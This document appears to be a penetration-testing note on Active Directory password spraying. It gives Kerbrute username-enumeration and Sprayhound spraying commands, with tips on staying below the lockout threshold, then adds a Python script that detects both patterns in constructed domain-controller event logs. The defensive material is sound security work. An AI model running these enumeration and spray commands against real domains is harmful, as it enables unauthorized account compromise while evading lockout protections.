Active Directory Password Spraying

Username Enumeration

Kerbrute

Install

go install github.com/ropnop/kerbrute@latest

Enumerate usernames from list

kerbrute userenum -d $ADDOMAIN usernames.txt -o username-enum-results.txt
To enumerate usernames, Kerbrute sends TGT requests with no pre-authentication. If the KDC responds with a PRINCIPAL UNKNOWN error, the username does not exist; if the KDC instead prompts for pre-authentication, the username exists. This does not cause any login failures, so it will not lock out any accounts. It does generate Windows event ID 4768 on the domain controller if Kerberos logging is enabled.

Password Spraying

Install Sprayhound

# Kali Linux
sudo apt install sprayhound -y

# Non-Kali
pipx install git+https://github.com/Hackndo/sprayhound.git

Run (Unauthenticated)

sprayhound -U userlist.txt -d $ADDOMAIN -dc $ADCONTROLLER -p 'Summer2024'
Run (Authenticated)

-t 2 stops the guessing when accounts are two failed attempts away from the lockout threshold.

Note that the lockout count will only reset with a valid login, even if there is a rule allowing more failed attempts after a certain amount of time. Therefore, this doesn't allow you to spray at max frequency.
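The two notes above describe what a domain controller sees: enumeration shows up as a burst of 4768 events with the PRINCIPAL UNKNOWN result code, and a spray shows up as pre-authentication failures spread across many accounts with each account kept under the lockout threshold. The following detection script is an added example, not part of the original notes or of the Kerbrute or Sprayhound projects. It runs over a small set of constructed 4768/4771 events (field names follow the Security log XML schema; the IP addresses, usernames, timestamps and thresholds are made up) and flags sources showing either pattern.

```python
"""Detect Kerberos username enumeration and password spraying from DC audit events.

Added example (not from the original notes): runs over constructed Windows
Security events (4768 TGT requested, 4771 pre-auth failed) and flags sources
that behave like an enumeration or spray tool. Sample data is constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# KDC result codes as they appear in the Status field of 4768 / 4771 events.
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"   # 4768: client principal unknown, username does not exist
KDC_ERR_PREAUTH_FAILED = "0x18"       # 4771: pre-authentication failed, wrong password for a real user


def _ev(event_id, ip, user, status, minute, second):
    """Build one constructed event record (hypothetical values)."""
    return {"EventID": event_id, "IpAddress": ip, "TargetUserName": user,
            "Status": status, "Time": datetime(2024, 6, 1, 9, minute, second)}


# Constructed sample log: 10.0.0.50 hammers unknown principals within seconds
# (enumeration), 10.0.0.51 tries one password against five real accounts
# (spray), and two workstations produce ordinary single-user noise.
EVENTS = (
    [_ev(4768, "10.0.0.50", name, KDC_ERR_C_PRINCIPAL_UNKNOWN, 0, i + 1)
     for i, name in enumerate(["aaron", "abby", "adam", "alex", "amy", "andy"])]
    + [_ev(4768, "10.0.0.7", "jsmiht", KDC_ERR_C_PRINCIPAL_UNKNOWN, 2, 0)]   # one typo
    + [_ev(4771, "10.0.0.51", name, KDC_ERR_PREAUTH_FAILED, 10, i * 10)
       for i, name in enumerate(["jsmith", "mjones", "klee", "rpatel", "dchen"])]
    + [_ev(4771, "10.0.0.8", "bob", KDC_ERR_PREAUTH_FAILED, 12, s) for s in (0, 30)]  # one user, twice
)


def _distinct_in_window(observations, window):
    """Max number of distinct usernames seen from one source inside any window.

    observations: list of (timestamp, username) tuples for a single source.
    """
    observations = sorted(observations)
    best = 0
    for i, (start, _) in enumerate(observations):
        users = {u for t, u in observations[i:] if t - start <= window}
        best = max(best, len(users))
    return best


def detect_enumeration(events, window=timedelta(minutes=5), min_unknown=5):
    """Sources that produced >= min_unknown 4768 events with status 0x6 for
    distinct usernames within one window. Returns {ip: distinct_count}."""
    per_ip = defaultdict(list)
    for e in events:
        if e["EventID"] == 4768 and e["Status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            per_ip[e["IpAddress"]].append((e["Time"], e["TargetUserName"]))
    flagged = {}
    for ip, obs in per_ip.items():
        n = _distinct_in_window(obs, window)
        if n >= min_unknown:
            flagged[ip] = n
    return flagged


def detect_spray(events, lockout_threshold=5, window=timedelta(minutes=30), min_accounts=5):
    """Sources with 4771/0x18 failures against >= min_accounts distinct accounts
    where no single account reached lockout_threshold. Staying under the
    per-account threshold is what keeps lockouts from firing, so only this
    cross-account view exposes the activity. Returns {ip: summary}."""
    per_ip = defaultdict(list)
    fails = defaultdict(int)   # (ip, account) -> failed attempts
    for e in events:
        if e["EventID"] == 4771 and e["Status"] == KDC_ERR_PREAUTH_FAILED:
            per_ip[e["IpAddress"]].append((e["Time"], e["TargetUserName"]))
            fails[(e["IpAddress"], e["TargetUserName"])] += 1
    flagged = {}
    for ip, obs in per_ip.items():
        n = _distinct_in_window(obs, window)
        worst = max(c for (src, _), c in fails.items() if src == ip)
        if n >= min_accounts and worst < lockout_threshold:
            flagged[ip] = {"accounts": n, "max_failures_per_account": worst}
    return flagged


if __name__ == "__main__":
    print("enumeration:", detect_enumeration(EVENTS))
    print("spray:", detect_spray(EVENTS))
```

The thresholds are deliberately conservative: a handful of unknown principals from one workstation is normal typo noise, while dozens in seconds is not, and the spray detector only fires when the per-account count stays below the domain's lockout threshold, which is the blind spot that account-lockout alerting alone leaves open.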